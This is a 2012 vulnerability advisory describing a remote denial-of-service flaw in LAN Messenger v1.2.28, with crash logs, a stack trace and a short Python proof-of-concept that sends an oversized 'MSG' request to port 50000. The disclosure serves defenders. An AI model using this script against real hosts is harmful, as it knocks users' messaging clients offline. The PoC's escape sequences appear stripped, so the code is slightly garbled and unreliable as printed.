Title: ====== LAN Messenger v1.2.28 - Denial of Service Vulnerability Date: ===== 2012-05-01 References: =========== http://www.vulnerability-lab.com/get_content.php?id=537 VL-ID: ===== 537 Introduction: ============= LAN Messenger is a free and open source cross-platform instant messaging application for communication over a local network. It does not require a server. A number of useful features including event notifications, file transfer and message logging are provided. (Copy of the Website: http://lanmsngr.sourceforge.net ) Abstract: ========= The Vulnerability Laboratory Research Team discovered a remote Denial of Service vulnerability on LAN Messenger v1.2.28. Status: ======== Published Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== Remote Denial of Service vulnerability is detected on LAN Messenger <= v1.2.28 (current version) for Windows. The vulnerability is triggered when sending a malformed initiation request to the client. The initiation consists of 3 parts: MSG + Number + UserID As an example: 0000 4d 53 47 30 30 30 43 32 39 43 39 43 32 39 32 41 MSG000C29C9C292A 0010 64 6d 69 6e 69 73 74 72 61 74 6f 72 dministrator When appending at least 8190 (Tested on WinXP) or more bytes to the \\\\\\\\\\\\\\\"MSG\\\\\\\\\\\\\\\" string, a C++ Exception is triggered. Windows-Crash-Log: Problemsignatur: Problemereignisname: APPCRASH Anwendungsname: lmc.exe Anwendungsversion: 1.2.2.8 Anwendungszeitstempel: 4f769831 Fehlermodulname: QtCore4.dll Fehlermodulversion: 4.8.0.0 Fehlermodulzeitstempel: 4ee593bc Ausnahmecode: 40000015 Ausnahmeoffset: 0018c779 Betriebsystemversion: 6.1.7601.2.1.0.274.10 Gebietsschema-ID: 1031 Zusatzinformation 1: c210 Zusatzinformation 2: c210baa76e54b5e894c7f7a96bc23eb7 Zusatzinformation 3: e02f Zusatzinformation 4: e02f83123de2633d9cdeb87470e7443f Application Crash-Log: [2012.04.28 20:49:12] New connection received [2012.04.28 20:49:12] Accepted connection from user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [2012.04.28 20:49:12] Sending public key to user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [2012.04.28 20:49:12] Connection to user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA lost Debug-Log: ModLoad: 00400000 0059a000 C:/Programme/LAN Messenger/lmc.exe ModLoad: 7c910000 7c9c9000 C:/WINDOWS/system32/ntdll.dll ModLoad: 7c800000 7c908000 C:/WINDOWS/system32/kernel32.dll ModLoad: 66200000 6621f000 C:/Programme/LAN Messenger/lmcapp2.dll ModLoad: 6fbc0000 6fbc7000 C:/Programme/LAN Messenger/mingwm10.dll ModLoad: 77be0000 77c38000 C:/WINDOWS/system32/msvcrt.dll ModLoad: 6e940000 6e950000 C:/Programme/LAN Messenger/libgcc_s_dw2-1.dll ModLoad: 6a1c0000 6a47c000 C:/Programme/LAN Messenger/QtCore4.dll ModLoad: 77da0000 77e4a000 C:/WINDOWS/system32/ADVAPI32.DLL ModLoad: 77e50000 77ee3000 C:/WINDOWS/system32/RPCRT4.dll ModLoad: 77fc0000 77fd1000 C:/WINDOWS/system32/Secur32.dll ModLoad: 774b0000 775ee000 C:/WINDOWS/system32/OLE32.dll ModLoad: 77ef0000 77f39000 C:/WINDOWS/system32/GDI32.dll ModLoad: 7e360000 7e3f1000 C:/WINDOWS/system32/USER32.dll ModLoad: 71a10000 71a27000 C:/WINDOWS/system32/WS2_32.DLL ModLoad: 71a00000 71a08000 C:/WINDOWS/system32/WS2HELP.dll ModLoad: 65100000 65ab4000 C:/Programme/LAN Messenger/QtGui4.dll ModLoad: 76350000 7639a000 C:/WINDOWS/system32/COMDLG32.DLL ModLoad: 5d450000 5d4ea000 C:/WINDOWS/system32/COMCTL32.dll ModLoad: 7e670000 7ee91000 C:/WINDOWS/system32/SHELL32.dll ModLoad: 77f40000 77fb6000 C:/WINDOWS/system32/SHLWAPI.dll ModLoad: 76330000 7634d000 C:/WINDOWS/system32/IMM32.DLL ModLoad: 770f0000 7717b000 C:/WINDOWS/system32/OLEAUT32.DLL ModLoad: 76af0000 76b1e000 C:/WINDOWS/system32/WINMM.DLL ModLoad: 72f70000 72f96000 C:/WINDOWS/system32/WINSPOOL.DRV ModLoad: 6ff00000 70041000 C:/Programme/LAN Messenger/QtNetwork4.dll ModLoad: 10000000 10113000 C:/Programme/LAN Messenger/libeay32.dll ModLoad: 78520000 785c3000 C:/WINDOWS/WinSxS/x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.4148_x-ww_d495ac4e/MSVCR90.dll ModLoad: 005f0000 0193a000 C:/Programme/LAN Messenger/QtWebKit4.dll ModLoad: 77bd0000 77bd8000 C:/WINDOWS/system32/VERSION.dll ModLoad: 6ed40000 6eda7000 C:/Programme/LAN Messenger/QtXml4.dll ModLoad: 773a0000 774a3000 C:/WINDOWS/WinSxS/x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202/comctl32.dll ModLoad: 5de80000 5de88000 C:/WINDOWS/system32/rdpsnd.dll ModLoad: 76300000 76310000 C:/WINDOWS/system32/WINSTA.dll ModLoad: 597d0000 59825000 C:/WINDOWS/system32/NETAPI32.dll ModLoad: 76bb0000 76bbb000 C:/WINDOWS/system32/PSAPI.DLL ModLoad: 746a0000 746ec000 C:/WINDOWS/system32/MSCTF.dll ModLoad: 75250000 7527e000 C:/WINDOWS/system32/msctfime.ime ModLoad: 5b0f0000 5b128000 C:/WINDOWS/system32/uxtheme.dll ModLoad: 68f00000 68f1a000 C:/Programme/LAN Messenger/imageformats/qgif4.dll ModLoad: 6bdc0000 6bdd9000 C:/Programme/LAN Messenger/imageformats/qico4.dll ModLoad: 645c0000 6460c000 C:/Programme/LAN Messenger/imageformats/qjpeg4.dll ModLoad: 632c0000 63322000 C:/Programme/LAN Messenger/imageformats/qtiff4.dll ModLoad: 76620000 766d6000 C:/WINDOWS/system32/userenv.dll ModLoad: 76d20000 76d39000 C:/WINDOWS/system32/iphlpapi.dll ModLoad: 77cd0000 77d03000 C:/WINDOWS/system32/netman.dll ModLoad: 76d00000 76d18000 C:/WINDOWS/system32/MPRAPI.dll ModLoad: 77c90000 77cc2000 C:/WINDOWS/system32/ACTIVEDS.dll ModLoad: 76dd0000 76df5000 C:/WINDOWS/system32/adsldpc.dll ModLoad: 76f20000 76f4d000 C:/WINDOWS/system32/WLDAP32.dll ModLoad: 76ad0000 76ae1000 C:/WINDOWS/system32/ATL.DLL ModLoad: 76e40000 76e4e000 C:/WINDOWS/system32/rtutils.dll ModLoad: 71b70000 71b83000 C:/WINDOWS/system32/SAMLIB.dll ModLoad: 778f0000 779e4000 C:/WINDOWS/system32/SETUPAPI.dll ModLoad: 763a0000 7654a000 C:/WINDOWS/system32/netshell.dll ModLoad: 76bc0000 76bef000 C:/WINDOWS/system32/credui.dll ModLoad: 5f8f0000 5f8fa000 C:/WINDOWS/system32/dot3api.dll ModLoad: 71260000 71266000 C:/WINDOWS/system32/dot3dlg.dll ModLoad: 72760000 72788000 C:/WINDOWS/system32/OneX.DLL ModLoad: 76f10000 76f18000 C:/WINDOWS/system32/WTSAPI32.dll ModLoad: 77a50000 77ae6000 C:/WINDOWS/system32/CRYPT32.dll ModLoad: 77af0000 77b02000 C:/WINDOWS/system32/MSASN1.dll ModLoad: 6db40000 6db62000 C:/WINDOWS/system32/eappcfg.dll ModLoad: 76020000 76085000 C:/WINDOWS/system32/MSVCP60.dll ModLoad: 47700000 4770e000 C:/WINDOWS/system32/eappprxy.dll ModLoad: 76ea0000 76edc000 C:/WINDOWS/system32/RASAPI32.dll ModLoad: 76e50000 76e62000 C:/WINDOWS/system32/rasman.dll ModLoad: 76e70000 76e9f000 C:/WINDOWS/system32/TAPI32.dll ModLoad: 408b0000 40996000 C:/WINDOWS/system32/WININET.dll ModLoad: 02a30000 02a39000 C:/WINDOWS/system32/Normaliz.dll ModLoad: 452e0000 45413000 C:/WINDOWS/system32/urlmon.dll ModLoad: 40f50000 4113b000 C:/WINDOWS/system32/iertutil.dll ModLoad: 72fa0000 72fb0000 C:/WINDOWS/system32/WZCSAPI.DLL ModLoad: 7db20000 7dbac000 C:/WINDOWS/system32/WZCSvc.DLL ModLoad: 76cf0000 76cf4000 C:/WINDOWS/system32/WMI.dll ModLoad: 7d4c0000 7d4e2000 C:/WINDOWS/system32/DHCPCSVC.DLL ModLoad: 76ee0000 76f07000 C:/WINDOWS/system32/DNSAPI.dll ModLoad: 745c0000 745cb000 C:/WINDOWS/system32/EapolQec.dll ModLoad: 61900000 61916000 C:/WINDOWS/system32/QUtil.dll ModLoad: 5e200000 5e310000 C:/WINDOWS/system32/ESENT.dll ModLoad: 68000000 68036000 C:/WINDOWS/system32/rsaenh.dll ModLoad: 03cc0000 03cd3000 C:/WINDOWS/system32/PrxerDrv.dll ModLoad: 719b0000 719f0000 C:/WINDOWS/system32/mswsock.dll ModLoad: 66710000 66769000 C:/WINDOWS/system32/hnetcfg.dll ModLoad: 719f0000 719f8000 C:/WINDOWS/System32/wshtcpip.dll (a64.6ec): Break instruction exception - code 80000003 (first chance) eax=7ffde000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005 eip=7c91120e esp=03f6ffcc ebp=03f6fff4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 ntdll!DbgBreakPoint: 7c91120e cc int 3 0:004> g (a64.e8c): C++ EH exception - code e06d7363 (first chance) eax=6fbc1350 ebx=00000000 ecx=003f2430 edx=003f2430 esi=7c91de6e edi=00000003 eip=7c91e514 esp=0022d004 ebp=0022d100 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 ntdll!KiFastSystemCallRet: 7c91e514 c3 ret Stack-Trace: ChildEBP RetAddr 0022d000 7c91de7a ntdll!KiFastSystemCallRet 0022d004 7c81cace ntdll!ZwTerminateProcess+0xc 0022d100 7c81cb26 kernel32!_ExitProcess+0x62 0022d114 77c09d45 kernel32!ExitProcess+0x14 0022d120 77c09e78 msvcrt!__crtExitProcess+0x32 0022d130 77c09eac msvcrt!_cinit+0xee 0022d144 77c0523b msvcrt!_exit+0x12 0022d18c 77c06bc1 msvcrt!raise+0xae *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:/Programme/LAN Messenger/QtCore4.dll - 0022d1e8 6a32d615 msvcrt!abort+0xe WARNING: Stack unwind information not available. Following frames may be wrong. 0022d208 6a34f667 QtCore4!ZN10QTextCodec12codecForNameEPKc+0x71 0022d228 6a350ee2 QtCore4!ZNK7QPointF7toPointEv+0x33b 0022d248 6a2c9ccb QtCore4!ZeqRK6QRectFS1_+0x17aa 0022d298 6a2f0a85 QtCore4!ZN16QCoreApplication14notifyInternalEP7QObjectP6QEvent+0x7b 0022d318 7e368734 QtCore4!ZN21QEventDispatcherWin3221registerEventNotifierEP17QWinEventNotifier+0x349 0022d354 7e368816 USER32!InternalCallWinProc+0x28 0022d3bc 7e3689cd USER32!UserCallWinProcCheckWow+0x150 0022d41c 7e368a10 USER32!DispatchMessageWorker+0x306 0022d42c 7e377721 USER32!DispatchMessageW+0xf 0022d464 7e3749c4 USER32!DialogBox2+0x15a 0022d48c 7e38a956 USER32!InternalDialogBox+0xd0 0022d74c 7e38a2bc USER32!SoftModalMessageBox+0x938 0022d89c 7e3b63fd USER32!MessageBoxWorker+0x2ba 0022d8f4 7e3b64a2 USER32!MessageBoxTimeoutW+0x7a 0022d928 7e3a0877 USER32!MessageBoxTimeoutA+0x9c 0022d948 7e3a082f USER32!MessageBoxExA+0x1b 0022d964 77c09300 USER32!MessageBoxA+0x45 0022d998 77c0b127 msvcrt!__crtMessageBoxA+0xf6 0022dba0 77c06bba msvcrt!_NMSG_WRITE+0x19e 0022dbf8 6a32d615 msvcrt!abort+0x7 0022dc18 6a34f667 QtCore4!ZN10QTextCodec12codecForNameEPKc+0x71 0022dc38 6a350ee2 QtCore4!ZNK7QPointF7toPointEv+0x33b 0022dc58 6a2c9ccb QtCore4!ZeqRK6QRectFS1_+0x17aa 0022dca8 6a2f0a85 QtCore4!ZN16QCoreApplication14notifyInternalEP7QObjectP6QEvent+0x7b 0022dd28 7e368734 QtCore4!ZN21QEventDispatcherWin3221registerEventNotifierEP17QWinEventNotifier+0x349 0022dd60 7e368816 USER32!InternalCallWinProc+0x28 0022ddc8 7e3689cd USER32!UserCallWinProcCheckWow+0x150 0022de28 7e368a10 USER32!DispatchMessageWorker+0x306 0022de38 6a2f3505 USER32!DispatchMessageW+0xf *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:/Programme/LAN Messenger/QtGui4.dll - 0022fc48 6517445c QtCore4!ZN21QEventDispatcherWin3213processEventsE6QFlagsIN10QEventLoop17ProcessEventsFlagEE+0x575 0022fcb8 6a2c898e QtGui4!ZN19QApplicationPrivate14enterModal_sysEP7QWidget+0x464 0022fce8 6a2c8d93 QtCore4!ZN10QEventLoop13processEventsE6QFlagsINS_17ProcessEventsFlagEE+0x36 0022fd38 6a2cd50f QtCore4!ZN10QEventLoop4execE6QFlagsINS_17ProcessEventsFlagEE+0x143 *** ERROR: Module load completed but symbols could not be loaded for C:/Programme/LAN Messenger/lmc.exe 0022fd78 0044f1c0 QtCore4!ZN16QCoreApplication4execEv+0x8b 0022feb8 004cf005 lmc+0x4f1c0 0022fef8 004cecc8 lmc+0xcf005 0022ff78 0040124b lmc+0xcecc8 0022ffb0 004012b8 lmc+0x124b 0022ffc0 7c817077 lmc+0x12b8 0022fff0 00000000 kernel32!BaseProcessStart+0x23 Proof of Concept: ================= The denial of service vulnerability can be exploited by remote attackers. For demonstration or reproduce ... #!/usr/bin/python from struct import pack import socket,sys import os target="192.168.0.1" port=50000 junk = "x41" * 8190 print "[*] Connecting to Target " + target + "..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((target, port)) print "[*] Connected to " + target + "!" except: print "[!] " + target + " didn't respondn" sys.exit(0) print "[*] Sending malformed request..." s.send("x4dx53x47" + junk) print "[!] Exploit has been sent!n" s.close() Risk: ===== The security irsk of the remote denial of service vulnerability is estimated as medium. Credits: ======== Vulnerability Laboratory [Research Team] - Julien Ahrens (MrTuxracer) [www.inshell.net] Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012 Vulnerability-Lab -- VULNERABILITY RESEARCH LABORATORY TEAM Website: www.vulnerability-lab.com Mail: research@vulnerability-lab.com